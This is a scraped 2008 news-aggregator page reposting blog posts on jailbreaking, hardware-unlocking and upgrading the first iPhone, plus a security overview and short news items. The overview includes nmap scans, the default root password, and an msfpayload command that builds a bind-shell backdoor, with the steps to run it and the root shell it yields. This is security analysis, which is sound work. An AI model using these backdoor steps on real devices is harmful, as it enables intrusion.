isactivated, you can install third-party applications, and the next stepshould be to unlock the device through a TurboSIM or similar hardwareSIM to use the phone capabilitiesEsteban is very happy now, as the initial iBrick he got from the storeis now an interesting still-to-explore iPhone device, and hopefully, acell phone soon : If you are as happy as Esteban, please donate somecash to the projects involved in the development of all the tools usedthroughout this guideFuture posts will focus on specific iPhone security aspectshttp://www.secuobs.com/revue/news/34468.shtmlhttp://www.secuobs.com/revue/news/34468.shtml 2008-11-09 14:20:48 - RaDaJo RAul, DAvid and JOrge Security Blog : In the previous iPhone series I covered how to activate et jailbreak theiPhone 112 OTB Out of The Box on Windows However, there was nosoftware trick to unlock the device and use the phone functionality ifthe iPhone runs the 46 bootloader version Although some contestsgave an incentive too find a solution, it seems there is no softwaretrick available yet Therefore, my friend Esteban ordered and recentlygot his iSIM, a hardware SIM "card" that can be used together withyour standard SIM card in order to use the phone with mobile operatorsdifferent from ATetT or the other Apple's European telecom partnersOne of the first set of tools you may want to install inside theiPhone is the BSD Subsystem Connect to the wireless network from theiPhone, and select the "Installer" icon on the Springboard Click onthe "Install" button, go to "System", and select and install the "BSDSubsystem" v20 at this time This package includes the standardUnix tools for the iPhoneIf you still doubt about your bootloader version , you can check itfollowing these steps they are not required to use the iSIM:1 From step 4 of the guide, we have an SSH server running on theiPhone Turn it on through the SSH icon on the Springboard2 You need to find and download from the Internet a tool called "bbupdater"Google is your friend It seems the file MD5 value is846e1ddada152947cc317a23de6715253 Enable your wireless network, and connect to it from the iPhoneThen, transfer the "bbupdater" tool from your computer to theiPhone as root into "/usr/bin" using a SSH client for Windows,such as "pscp" PuTTY: "pscp bbupdater root@1000100:/usr/bin"4 Login as root on the iPhone through SSH using PuTTY, change thepermissions on the file to make it executable, and run the"bbupdater" tool The last line of the output displays thebootloader versionAfter checking the version, restart the iPhone by typing the "reboot"command You can turn off the SSH server if you are not going toconnect back to itThe process to use the iSIM and unlock the iPhone by hardware is verysimple:1 Prepare your standard SIM to "accommodate" the iSIM You willneed to follow the instructions from your iSIM vendor, that inEsteban's case, required to cut a corner of the SIM to fit andinstall both together inside the iPhone2 Install the iWorld application Connect to the wireless networkfrom the iPhone, and select the "Installer" icon on theSpringboard Click on the "Install" button, go to "Tweaks112", and select and install "iWorld" This package fixes abug in the iPhone that limits the device to use the phone or SMScapabilities with non-supported SIMs If you try to call to anynumber at this point without iWorld, the phone or SMS applicationscrash3 Once installed, select the new "iWorld" icon from the Springboardand select your country The iPhone will reboot to set yourcountry settings4 Click on the "Phone" icon on the Springboard, type a number,and establish your first call from your iPhoneNOTE: At the time of this writing, the "Installer" will ask you toupdate to a newer version, 30 I recommend you to updateIt is important not to confuse the iSIM hardware SIM card orTurboSIM, etc with the iSIM software tool The iSIM tool is availablethrough the Makayama repository, "http://tinyurlcom/2t8cax" add thisURL to your "Installer" sources if you want to use it and providescapabilities to manage the contacts between the iPhone and the SIMcard Go to "Installer", select the "Install" button, then "Utilities"and install "iSIM" v103 at this timeThe next thing I'm going to get from Apple is the i-Jam ;http://www.secuobs.com/revue/news/34465.shtmlhttp://www.secuobs.com/revue/news/34465.shtml 2008-11-09 14:20:48 - RaDaJo RAul, DAvid and JOrge Security Blog : Once you get access and can finally use your iPhone, it is time to focuson the security of the device this is what the RaDaJo Blog is allabout ; This post covers the basics Security 101, while futurepost will focus on specific iPhone capabilities, such as WiFi,Bluetooth, etc It is interesting to analyze the security of theiPhone from two distinct angles:* A device we need to protect as is going to be in wide spread useand, potentially, is going to store very sensitive and privateinformation call and SMS history, address book, voicemail data,user and mail credentials, application data, etc and be used forvoice and data communications* A mobile auditing device that could be used by infosecprofessionals to perform assessment in standard TCP/IP networks,and WiFi or Bluetooth environments Remember it runs Unix, hasplenty of storage 8Gb and a decent CPU 400Mhz, plus extensivenetworking capabilitiesFor now, let's focus on the first oneNOTE: Although I figured out I duplicated some of the steps alreadyperformed by Paul Asadoorian, I wanted to double-check the results andverify if there were any differences between a standard 112 iPhoneand a jailbroken oneGeneral iPhone Security* After getting access to an iPhone Unix shell, you can observe thatevery process runs as root This is why the jailbreak processsucceed, as the exploitation of the libtiff vulnerability throughMobileSafari provided unlimited privileges on the device Anyfuture security flaw in any iPhone application can lead to asimilar complete system compromise* The first known iPhone exploit was focused on vulnerabilities onthe Perl Regular Expression Library PCRE, and presented onBlackHat 2007* The iPhone is a fully-fledged client device, a mobile Mac, withsupport for Word, Excel and PDF docs Watch out futurevulnerabilities in the associated applications* The Metasploit Framework MSF v3 already implements severalpayloads for the iPhone: bind and reverse shell, and even one tomake it vibrate See initial HD Moore security analysis* The iPhone multimedia capabilities can turn it into a perfectspying tool, specially by hacking the mic/speakers, camera andphone* As a consequence of the hacking wars between Apple and thecommunity to free the device, the iPhone comes with the latestfirmware installed from factory, 112 at this point in time Thisis not always the case for lots of devices, as Paul points out* This is one of the most well known iPhone hacking demonstrationson the Internet: it turns the iPhone into a remote eavesdroppingdevice or bug You can see the video here Metasploit was used toinstall a recording tool, called rrecord remote record, thatrecords the ambient sound around the iPhoneOS FingerprintingUsing nmap 450, the iPhone 1000101 operating system OS can beeasily fingerprinted:# nmap -O 1000101Starting Nmap 450 http://insecureorg at 2008-01-02 14:44 GMTAll 1711 scanned ports on 1000101 are closedMAC Address: 00:1E:C2:XX:XX:XX AppleDevice type: phone|media device|general purpose|web proxy|specializedRunning: Apple embedded, Apple Mac OS X 102X|103X|104X|105X, Blue Coat SGOS 5X, FreeBSD 4X, VMWare ESX Server 30XToo many fingerprints match this host to give specific OS detailsNetwork Distance: 1 hopOS detection performed Please report any incorrect results Nmap done: 1 IP address 1 host up scanned in 30819 secondsBecause all the near 2000 scanned ports are closed, nmap output is notvery accurate and it simply reflects a OS X device At the end of thejailbreak process we installed SSH If the SSH service is enabled,then the nmap results are much more accurate simply by using an openand a closed port, 22 and 80 respectively:# nmap -O -p 22,80 1000101Starting Nmap 450 http://insecureorg at 2008-01-02 14:42 GMTInteresting ports on 1000101:PORT STATE SERVICE22/tcp open ssh80/tcp closed httpMAC Address: 00:1E:C2:XX:XX:XX AppleDevice type: phone|media deviceRunning: Apple embeddedOS details: Apple iPhone mobile phone or iPod Touch audio player Darwin 900d1Uptime: 686942 days since Tue Feb 14 16:05:40 2006Network Distance: 1 hopOS detection performed Please report any incorrect results Nmap done: 1 IP address 1 host up scanned in 19619 secondsMobileSafariIf you browse the Web with the iPhone using the MobileSafari browserand point it to your own Web server 10002, you can easily obtainthe device User-Agent What really surprised me was that you can evenget the exact firmware version, 3B48b meaning 112:$ nc -l -p 80GET / HTTP/11Accept-Language: enAccept-Encoding: gzip, deflateUser-Agent: Mozilla/50 iPhone ; U; CPU like Mac OS X; en AppleWebKit/4201 KHTML, like Gecko Version/30 Mobile/3B48b Safari/4193Accept: text/xml,application/xml,application/xhtml+xml,text/html; q=09,text/plain;q=08,image/png,*/*;q=05Connection: keep-aliveHost: 10002TCP/IPThe iPhone responds to ping ICMP echo requests by default It seemsit could present a potential Etherleak vulnerability, and in fact, Ican confirm Paul initial research, as I got the same behavior BTW,the old Linksys WRT54G v5 firmware version 1002 - Oct 31, 2005 Iused for these tests suffers the same vulnerability last 4 bytes arealways differentBy default, connection establishments to closed TCP ports are answeredwith a TCP RST packet, and connection establishments to closed UDPports are answered with an ICMP Port Unreachable packetIf the SSH service is turned off see next section, a full TCP scanonly shows one port open, port TCP/62078:# nmap -sT -p1-65535 1000101Starting Nmap 450 http://insecureorg at 2008-01-02 02:08 GMTInteresting ports on 1000101:Not shown: 65534 closed portsPORT STATE SERVICE62078/tcp open unknownMAC Address: 00:1E:C2:XX:XX:XX AppleNmap done: 1 IP address 1 host up scanned in 64531180 secondsThe TCP/62078 port is used internally when syncing with iTunes Usingtcpdump on the "lo0" interface from within the iPhone, it is possibleto capture the traffic generated during a sync operation on iTunesThis traffic contains binary data and XML strings It also uses othersource and destination ports in the 49xxx range during the syncoperation, always using the localhost address as source anddestinationA full UDP scan only shows the Multicast DNS port open, UDP/5353:# nmap -sU -T4 -p1-65535 1000101Starting Nmap 450 http://insecureorg at 2008-01-14 03:00 GMTInteresting ports on 1000101:Not shown: 65534 closed portsPORT STATE SERVICE5353/udp open|filtered zeroconfMAC Address: 00:1E:C2:XX:XX:XX AppleNmap done: 1 IP address 1 host up scanned in 4966680 secondsPort UDP/5353 corresponds to the Zeroconf aka Rendezvous or Bonjourmulticast protocol, or Zero Configuration Networking, used toestablish networking connections without configuration or servers ThemDNSResponder service runs by default on this port and advertises thedevice on the local network, exposing device details The multicastDNS traffic generated destination IP 22400251 contains the devicehostname, "iPhone", followed by a hyphen "-" and the WiFi MACaddress Related details are leaked on the DHCP requests used toobtain an IP address The iPhone includes its name on the requests,that by default is "iPhone"The external port findings can be ratified by running "netstat" on thedevice Surprisingly, specially with port TCP/62078, the bindings forall TCP and UDP ports discovered are made to all addresses **SSHThe SSH service is enabled by default after the jailbreakSpecifically, the iPhone is running the OpenSSH 46 version This infocan be easily obtained using netcat or nmap:# nc 1000101 22SSH-20-OpenSSH_46# nmap -sV -p 22 1000101Starting Nmap 450 http://insecureorg at 2008-01-02 14:39 GMTInteresting ports on 1000101:PORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 46 protocol 20MAC Address: 00:1E:C2:XX:XX:XX AppleService detection performed Please report any incorrect results Nmap done: 1 IP address 1 host up scanned in 17232 secondsThe SSH access is almost useless unless you install the BSD Subsystemthat provides all the standard Unix commands and toolsExploitation and backdoorsHD Moore did a great job in the "Cracking the iPhone" series,dissecting the iPhone internals, providing debugging tools, andwalking the reader through the process of writing the exploit for thelibtiff vulnerability; not an easy task, since the iPhone stack memoryis marked non-executable, therefore, standard stack-based bufferoverflows don't work The original libtiff exploit, and HD Moore's one,use the return-to-libc technique Then, the exploit was improved andmodified for stock iPhones non-jailbroken Very interesting read ofa multi-part payload stager/stage to execute code inside the iPhone,that finishes with a full MSF v3 session showing how to run the ipwnshell after exploiting the libtiff vulnerability, and how to patchthis vulnerabilityAs explained there, Metasploit provides support for iPhone executablesin the "msfpayload" tool This allows an attacker or pen-tester tocreate a stand-alone backdoor iPhone executable that can bind ashell to a port or launch a reverse shell or make the iPhone vibrate:$ msfpayload osx/armle/shell_bind_tcp LPORT=2222 X /tmp/bindshellbinCreated by msfpayload http://wwwmetasploitcomPayload: osx/armle/shell_bind_tcpLength: 200Options: LPORT=2222To create the backdoor, this "bindshellbin" binary should be copiedto the iPhone for example using PSCP to "/tmp", its permissionschanged, and executed Then, a new shell is offerered on port TCP/2222that can be remotely accessed with netcat:$ ssh root@1000101# cd /tmp# chmod u+x bindshellbin# /bindshellbin$ nc 1000101iduid=0root gid=0wheel groups=0wheelpwd/private/var/tmpls -ltotal 80drwx------ 2 root wheel 102 Feb 2 02:56 MediaCache-rw-r--r-- 1 root wheel 0 Feb 2 04:16 MobileSyncRunninglock-rwxr--r-- 1 root wheel 16472 Feb 2 05:01 bindbindrwx------ 2 root wheel 102 Feb 2 02:56 launchd-rw-r--r-- 1 root wheel 16472 Feb 2 05:01 vibratebinuname -aDarwin 1000101 900d1 Darwin Kernel Version 900d1: Wed Oct 10 00:07:50 PDT2007; root:xnu-93300204obj~7/RELEASE_ARM_S5L8900XRB iPhone1,1 unknownI want to close this initial iPhone security post emphasizing one ofthe major risks with the current software distribution model on theiPhone After the jailbreak it is possible to install third-party appson the device through the "Installer" package manager Users coulddownload malicious software from the available repositories In fact,exploiting this input vector, the first iPhone malware specimen wasreleased early this year It used social engineering tricks to presentitself as a preparation software required to update to version 113,but it was not very dangerous this time What if someone publishes theMetasploit payloads described before through "Installer"Additionally, and although it was not created with maliciousintentions, there is a Mobile Safari plug-in that provides filedownloading capabilities to the browser - another way of downloadingall kind of files into the devicehttp://www.secuobs.com/revue/news/34464.shtmlhttp://www.secuobs.com/revue/news/34464.shtml 2008-11-09 14:20:48 - RaDaJo RAul, DAvid and JOrge Security Blog : Apple released the iPhone 113 firmware version on January 2008 From asecurity perspective and according to Apple, the iPhone 112 presentsa few vulnerabilities:* A memory corruption issue in Safari's handling of URLs may causearbitrary code execution If you browse to a maliciously craftedURL, you are iP0wn3d DoS exploit publicly available in milw0rm* An incorrect handling of emergency calls allows users withphysical access to the iPhone to launch an application avoidingthe passcode lock screen* Safari presents a XSS cross-site scripting vulnerability in theWebKit component Visiting a maliciously crafted web page may leadto the disclosure of sensitive informationContinuing the iPhone series, once your iPhone 112 OTB has beenactivated and jailbroken, thanks to the iPhone Dev Team there is a newmethod to upgrade to 113 and stay secure This post covers theeasier option, that is, using the "Installer" to directly upgrade fromthe iPhone without requiring a PC however, you need a WiFi connectionto connect to the Internet There are other methods for Windows andMac tooNOTE: All the third-party applications you previously installed willdisappear from Springboard You will need to reinstall them after the113 upgrade Some capabilities will break, as this "hack" is prettynew, so stay tuned on the Internet Blogs, forums, etc for fixesMost probably, this is the last post about general iPhone hacks in theRaDaJo blog; only security topics will be posted in the futureYou need to be very careful adding new "Installer" sources, as anbuggy or malicious software package install can render your iPhoneuseless iBrick If this happens to you, you can repeat the wholejailbreak process going back to 111 At this point, after followingthe whole jailbreak guide, the only sources available should be:* AppTap: AppTapp Official NullRiver* Community Sources: Conceited Software, ModMyiFonecom and StePackaging* Makayama Software if you tried to install the iSIM software toolPrerequisites:* You need to start with an activated and jailbroken 112 iPhoneCheck the guide to do it* You need to install the BSD Subsystem v20, as we did when weenabled the phone capabilities You can check the version from"Installer" by selecting the "Uninstall" button* Disable the lock timeout, as we already did on STEP 3 of the 112guide: Go to "Settings", select "General" and the "Auto-Lock"option Set the value to "Never"* Go to "Installer" and select the "Update" button You need to use"Installer" version 30 Previous versions won't work* Establish a connection with your WiFi network to get InternetaccessSteps to upgrade to version 113:* Go to "Installer" and select the "Install" button Go to the"System" category and install the "Official 113 Upgrade" Atthis time it is version 113-3 Click on "Install" twice* As indicated by the message, exit "Installer" and run "Upgrade"from the Springboard* The process asks if you want to use hacktivation and patchlockdownd Answer "Yes" in order to be able to use the phonecapabilities with the hardware SIM hack iPhone 112 OTB has the46 bootloader and it can only be unlocked using a SIM hardwarehack at this time* Then, it asks if you want to completely restore your device,deleting all data It is recommended to answer "Yes" to avoid anysoftware conflicts between versions backup first, although Ianswered "No" to check what applications and data survived Alldata should be there music, videos, etc and the applications arestill installed but not referenced from Springboard* The iPhone now downloads the 113 firmware version from Apple andperforms the appropriate hacks You get a progress banner on theiPhone This process takes lot of time, around 30-60 minutes* The last step shows a "Attempting to Reboot iPhone" message If itis there for more than 15 minutes without rebooting, hold down thePower and Home buttons until the phone shuts down Then hold downthe Power button to turn the iPhone back on, a process that willtake a few minutes* When the process completes, the iPhone reboots and runs firmware113 The baseband version is not modified using this procedureIf during the upgrade, you answer "No" to the first hacktivationquestion as I did, then you need to patch lockdownd manually Ifnot, iTunes will generate an error message and the iPhone remains inan unactivated state Download the patched lockdownd version andtransfer it to the iPhone through SSH: "scp lockdowndroot@1000100:/usr/libexec/" before this, make a backup copy of theprevious lockdownd version Verify that the file permissions are 555You can reboot the iPhone and it will be active nowOne of the first recommended actions is to update the "Installer"sources Go to "Installer", select the "Install" button and go to the"Sources" category Install the "Community Sources", version 33 atthis time By default, the sources list only contained the "AppTappOfficial" entry New applications for 113, such as "Tweaks 113",are populated on the list of available packages, and four new entriesare added to the sources listGo to "Settings", then "General" and "About" to check that the"Version" now is "113 4A93" while the "Modem Firmware" is still"040213_G" The 113 version includes new features, that you couldbe simulated in 112, although now are already on your device:* The first thing you notice is that it notifies you about "EditHome Screen" capabilities You can now rearrange icons on theSpringboard* The new Google Maps Faux-GPS, based on triangulating your locationusing the mobile cell towers, doesn't work because the baseband isnot updated during the process Go to "Installer", "Install"button, "All Packages", search and install "Navizon GPS"currently version 114 Create an account in "Navizon" to usethe location service, and when it locates you once, you are readyto use the Google Maps Faux-GPS sometimes you need to setNavizon's "Invisible" switch to "Off"* You can now send SMS messages to multiple users simultaneouslyThe previous activation and hardware-based unlock based on the iSIMcard work perfectly with the new 113 version iWorld must not bereinstalled All capabilities work as they did on 112, except someof the previously installed third-party applications, plus a fewwell-known bugs, because now the Springboard runs as "mobile" and notas "root" good security improvement:* You need to refresh the sources on "Installer" and reinstallprevious software packages Although at this point you can accessthe iPhone through SSH and run standard Unix commands, it isrecommended to reinstall at least the BSD Subsystem and theOpenSSH server* Reinstall the "BSD Subsystem" by going to "Installer", use the"Install" button, go to "System", and select and install the "BSDSubsystem" v20 This fixes some VT100 terminal display issueslike backspaces not showing properly* OpenSSH is a crucial service to manage your iPhone It can bereinstalled by going to "Installer", select "System" and install"OpenSSH" currently v46p1-1 There is no icon on theSpringboard on 113 to disable the service, and the device hasthe default password root/alpine :* You cannot use the Unix "passwd" command to change the password on113, as it is broken Don't even try You get a messageindicating this when you install the BSD Subsystem Replace thepasswd command by uploading this file to the "/usr/bin" iPhonedirectory rename it from passwd113 to passwd Make a copy of theprevious passwd file Change the new file permissions to 755:"chmod 755 /usr/bin/passwd" Now, you can run "passwd" to changethe default password from a SSH terminal* The recommended SSH management tool is called "BossPrefs" Go to"Installer", then select the "Install" button, "All Packages" andinstall "BossPrefs" v153 It provides capabilities toenable/disable the SSH server and even set its state when theiPhone restarts through the "Config" menu* Set up the iPhone to the appropriate timezone If you go to"Settings" and "Date et Time", when you change the "TimeZone" the"/var/db/timezone/localtime" file is recreated The directory isnow owned by root, but the "Settings" application runs as"mobile", so it cannot recreate it Change the directorypermissions to 777: "chmod 777 /var/db/timezone"* Re-add the Makayama repository is you want to manage contacts withthe iSIM toolNOTE: The current 113-3 update fixes several issues of the previous113 jailbreaks There is a similar 113 method available from NateTrue's FAQ, however, it seems it could present some issues, so thelatest Dev Team's -3 method is the recommended method More bugs,fixes and 113 jailbreak versions will appear From now on, Google isyour friend ;Some final iPhone hacking news: Apple's applications signature keyrequired by "official" iPhone third-party applications has leaked, andthe iPhone 113 SDK framework documentation is availablehttp://www.secuobs.com/revue/news/34463.shtmlhttp://www.secuobs.com/revue/news/34463.shtml 2008-11-07 23:08:24 - Rootsecure.net : Forbes: Crashing The iPhonehttp://www.secuobs.com/revue/news/34240.shtmlhttp://www.secuobs.com/revue/news/34240.shtml 2008-11-07 11:08:01 - Rootsecure.net : The Inquirer: Iphone OS 22 secrets revealed "turn by turn GPS routefinding"http://www.secuobs.com/revue/news/34075.shtmlhttp://www.secuobs.com/revue/news/34075.shtml 2008-11-07 04:48:14 - Hack In The Box : Apple appears to have taken its campaign against iPhone modders to abaffling new level, tweaking its new MacBooks and MacBook Pros todisable a popular software tool used to jailbreak the handsetAccording to discussion groups here and here, iPhone and iPod Touchusers who have unlocked their devices using the Pwnage Tool are unableget their new MacBooks to recognize the devices Instead theirall-aluminum machines display an error message saying "An iPod hasbeen detected, but it could not be identified properly" Oddly, othertypes of Macs and Windows machines recognize the modded devices justfine The quirk comes as hackers with the iPhone Dev Team cracked thedevice's latest firmware versionhttp://www.secuobs.com/revue/news/34044.shtmlhttp://www.secuobs.com/revue/news/34044.shtml 2008-11-07 04:48:14 - Hack In The Box : A GERMAN BOGGER has apparently been fiddling with the developer releaseof the next iteration of the Iphone OS and has discovered that thenot-yet-announced update will allow users to download video and audiopodcasts without resorting to Itunes Genuine-looking screen shotsshow a podcast being downloaded over a 3G network so it looks like thefunctionality will not be restricted to wifi connectionshttp://www.secuobs.com/revue/news/34038.shtmlhttp://www.secuobs.com/revue/news/34038.shtml 2008-11-06 22:32:10 - Latest from Computerworld : ATetT is working with Apple to devise a way for iPhone owners to turn thedevice into an ad hoc cellular modem that can connect their laptops tothe Web while they're on the roadAdd to digg Add to StumbleUpon Add to Twitter Add to SlashdotIMAGEhttp://www.secuobs.com/revue/news/33981.shtmlhttp://www.secuobs.com/revue/news/33981.shtml 2008-11-06 21:48:24 - Latest from Computerworld : Apple's iPhone ranked No 1 in customer satisfaction among businessusers, beating smart phones made by Research In Motion and Samsung bywide margins, JD Power and Associates said todayAdd to digg Add to StumbleUpon Add to Twitter Add to SlashdotIMAGEhttp://www.secuobs.com/revue/news/33973.shtmlhttp://www.secuobs.com/revue/news/33973.shtml 2008-11-06 02:48:17 - Hack In The Box : Apparently Apple has found a way to at least theoretically disable iPhoneunlock software It’s been reported by users of HowardForums thatthe most recent Apple Macbooks somehow disable the popular PwnageiPhone software unlock tool Pwnage tool requires iPhones that areabout to be unlocked to be swtched into DFU mode, but once that’sdone the new aluminum Macbooks simply cannot recognize the deviceIt’s hard to imagine that this issue could be attributed to theactual components of these Macbooks; it is most likely that a newbuild of iTunes that these Macbooks come preloaded with is what iscausing this problemhttp://www.secuobs.com/revue/news/33810.shtmlhttp://www.secuobs.com/revue/news/33810.shtml 2008-11-05 22:15:10 - Packet Storm Security Headlines : http://www.secuobs.com/revue/news/33749.shtmlhttp://www.secuobs.com/revue/news/33749.shtml 2008-11-05 17:37:58 - Global Security Mag Online : Crashing The iPhoneDate : 05 Novembre 2008Plateforme : Mac OS XProgramme : iPhoneGravité : FaibleExploitation : Avec un fichier malicieuxDommage : Déni de serviceDescription :Une vulnérabilité a été découverte au sein de l'IPhone En effetZambrini, ingénieur italien et également auteur du logiciel dedéblocage "Ziphone" vient de mettre en évidence un bug lors del'ouverture de vidéos malforméesLe problème résulte d'un mauvais traitement des données audioprovenant d'une vidéo Dès l'ouverture, - Vulnérabilitéshttp://www.secuobs.com/revue/news/33691.shtmlhttp://www.secuobs.com/revue/news/33691.shtml 2008-11-05 16:47:33 - ZATAZ News : Les possesseurs d´iPhone et d´iPod Touch peuvent contrôler ou accéder àdistance à leur PC ou Mac, professionnel ou personnel, grâce à LogMeInIgnitionhttp://www.secuobs.com/revue/news/33672.shtmlhttp://www.secuobs.com/revue/news/33672.shtml 2008-11-04 14:32:49 - News : Analyst's prediction that Apple will cut iPhone production by 40percent draws flakread moreIMAGEhttp://www.secuobs.com/revue/news/33377.shtmlhttp://www.secuobs.com/revue/news/33377.shtml 2008-11-04 02:12:55 - Hack In The Box : Italian systems engineer Piergiorgio Zambrini won fame and money lastyear when he created "Ziphone," the first widespread application thatunlocked iPhones to run on mobile carriers other than ATetT Now he'smaking another bid for the spotlight by revealing a bug that can crashthe iPhone and, he says, other devices including iPods and Applecomputers Zambrini planned to publish news about the bugMonday--although he's saving the technical details for Apple nasdaq:AAPL - news - people , he says--at least for now The 38-year-oldsecurity expert praises Apple's marketing prowess and calls Steve Jobsa genius But there are chinks in Apple's software--and Zambrini isdetermined to uncover them The bug Zambrini found is in the audioportion of Apple's video format Knowing the bug exists, someone couldwrite a program that incorporates the bug into a video file andtrigger a crash whenever an iPhone attempts to run that file The bug,which is located in a shared code library that is used across mostApple operating systems and some Linux ones as well, doesn't appear tocause any permanent damage, but immediately sends the device into apanic that leads to a lengthy reboothttp://www.secuobs.com/revue/news/33263.shtmlhttp://www.secuobs.com/revue/news/33263.shtml 2008-11-03 02:55:58 - Hack In The Box : As it is, Apple is notorious for sneaking undocumented features intotheir software updates Therefore it’s not too surprising that a newundocumented feature appeared with iPhone firmware v21 updateAccording to Clancy, a reader of AppleInsider, iPhone firmware v21has introduced a feature that doesn’t seem to have much use for, butis nevertheless rather interesting due to how it’s possible toimplement it Apparently, it is possible to open iPhone webapps infullscreen mode, making them look like actual native applicationsClancy has even written a program that illustrates thathttp://www.secuobs.com/revue/news/33072.shtmlhttp://www.secuobs.com/revue/news/33072.shtml 2008-11-03 02:55:58 - Hack In The Box : Putting Intel Corp's Moorestown chip package inside a future version ofthe iPhone would make the smart phone less secure, according to anindependent security researcher "That will make the iPhone x86, andthat will make a lot of attacks easier," said Dino Dai Zovi, anindependent security researcher, in an interview at the Hack In TheBox security conference in Kuala Lumpur, Malaysia Apple Inc hasnever said it intends to use Moorestown in future products, but Intelis widely believed to be hopeful that Apple will adopt the chippackage Due for release in 2009 or 2010, Moorestown is a chip packagedesigned for smart phones and other handheld computers The heart ofthe package is an upcoming version of Intel's Atom processor, aninexpensive low-power x86 processorhttp://www.secuobs.com/revue/news/33069.shtmlhttp://www.secuobs.com/revue/news/33069.shtml 2008-10-31 21:17:42 - Latest from Computerworld : x86-based processors are much more familiar ground to hackers than theARM chips, says Dino Dai Zovi, a security researcherAdd to digg Add to StumbleUpon Add to Twitter Add to SlashdotIMAGEhttp://www.secuobs.com/revue/news/32862.shtmlhttp://www.secuobs.com/revue/news/32862.shtml 2008-10-31 21:17:42 - Latest from Computerworld : What used to be 79 programs on this writer's iPhone at the start of thismonth has become 107 programs But navigating this mess of iconsrequires a ton of either swiping or tapping, and either way it's anightmareAdd to digg Add to StumbleUpon Add to Twitter Add to Slashdothttp://www.secuobs.com/revue/news/32859.shtmlhttp://www.secuobs.com/revue/news/32859.shtml 2008-10-31 16:25:48 - News : Putting Intel's Moorestown chips in a future version of the iPhonecould make the handset less secure, a researcher warnedread moreIMAGEhttp://www.secuobs.com/revue/news/32773.shtmlhttp://www.secuobs.com/revue/news/32773.shtml